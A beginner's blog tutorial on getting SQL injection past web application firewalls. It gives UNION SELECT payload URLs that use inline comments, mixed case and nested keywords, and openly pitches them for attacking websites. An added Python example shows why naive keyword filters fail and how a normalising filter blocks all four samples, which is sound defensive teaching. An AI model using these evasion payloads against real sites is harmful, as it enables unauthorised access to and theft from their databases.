In my previous posts, I have explained the different types of SQL injection. Sometimes, when we try to retrieve data from SQLi-vulnerable websites, we end up with a forbidden error. Today I will explain why you get such errors and how you can bypass them and perform successful attacks on websites. If you have not read my previous posts and you are new to SQLi, I would suggest you read them before proceeding.
You can read them from here.
- SQL Injection Tutorial -Part1
- SQL Injection Part 2
- SQL Injection Part 3 - Blind Sql Injection
- SQL Injection part 4 with SQLMAP
What is a WAF?
WAF stands for Web Application Firewall. In order to prevent attacks such as SQLi and XSS, administrators put a Web Application Firewall in front of the application. These WAFs detect malicious attempts using signature-based filters and escape rules defined in a rule list. As a result of this design, they are vulnerable and can be easily bypassed.
How it works?
When the WAF detects a malicious attempt, our input URL gives a forbidden error, as shown in the following figure.
Our aim is to bypass this error and retrieve data from the database using some special techniques. There are many methods to bypass a WAF. In this tutorial, I am going to show you some basic methods. These methods are especially for beginners.
Methods To Bypass WAF
Comments:-
Comments allow us to bypass a lot of the restrictions of web application firewalls and to kill certain SQL statements, executing the attacker's commands while commenting out the actual legitimate query.
Actual query:
http://vulnerablesite.com/detail.php?id=44 union all select 1,2,3,4,5--
Query to bypass the WAF:
http://vulnerablesite.com/detail.php?id=44 /*!UNION*/+/*!ALL*/+/*!SELECT*/+1,2,3,4,5--
Capitalization Of Functions:-
Some WAFs will filter only lowercase keywords, so we can easily evade them by changing the case.
Actual query:
http://vulnerablesite.com/detail.php?id=44 UNION SELECT 1,2,3,4,5--
Query to bypass the WAF:
http://vulnerablesite.com/detail.php?id=-1 uNiOn SeLeCt 1,2,3,4,5--
Replaced Keywords:-
Some WAFs will escape (strip out) certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another: once the filter removes the inner occurrence, the surrounding characters join up and form the keyword again.
Actual query:
http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5--
Query to bypass the WAF:
http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5--
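To see why all three tricks above get past a signature filter, and what a filter has to do differently to catch them, here is an added Python example (not code from the original post or from any WAF product). The keyword list, the naive strip-once filter and the normalising filter are constructed for illustration; the sample query strings are the ones from this post.

```python
import re
from urllib.parse import unquote_plus

# Keywords a simple signature filter looks for (constructed for this example).
KEYWORDS = ("union", "select", "order by")
KEYWORD_RE = re.compile("|".join(re.escape(k) for k in KEYWORDS))


def naive_sanitize(query: str) -> str:
    """Models the WAF behaviour described in the post: it only knows the
    lowercase keyword spelling and 'escapes' a hit by deleting that one
    occurrence. Returns what the application receives afterwards."""
    out = query
    for kw in KEYWORDS:
        out = out.replace(kw, "", 1)
    return out


def normalize(query: str) -> str:
    """Canonicalise the request before matching, so that comment wrapping,
    URL encoding and case mixing collapse back to the plain keyword."""
    s = unquote_plus(query)                                  # %xx and '+' become spaces
    s = s.lower()                                            # uNiOn -> union
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)   # MySQL executes /*!...*/: keep the body
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)             # ordinary comments are just whitespace
    return re.sub(r"\s+", " ", s).strip()


def hardened_blocks(query: str) -> bool:
    """Reject instead of strip: a keyword anywhere in the normalised input
    (substring match, so UNIunionON is caught before any stripping) blocks it."""
    return KEYWORD_RE.search(normalize(query)) is not None


if __name__ == "__main__":
    # The four query strings from the post (query-string part only).
    samples = [
        "id=44 union all select 1,2,3,4,5--",
        "id=44 /*!UNION*/+/*!ALL*/+/*!SELECT*/+1,2,3,4,5--",
        "id=-1 uNiOn SeLeCt 1,2,3,4,5--",
        "id=-1 UNIunionON SEselectLECT 1,2,3,4,5--",
    ]
    for q in samples:
        print(f"{q!r}\n  after naive strip : {naive_sanitize(q)!r}"
              f"\n  hardened blocks   : {hardened_blocks(q)}")
```

Run it and the naive filter neutralises only the first, plain query; the three evasions pass through it with an executable UNION SELECT intact, while the normalising filter rejects all four.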
Hope you liked this article. Feel free to leave your comments for further doubts and clarifications.
Read more: http://www.101hacker.com/2011/11/sql-injections-part-5-bypassing-waf.html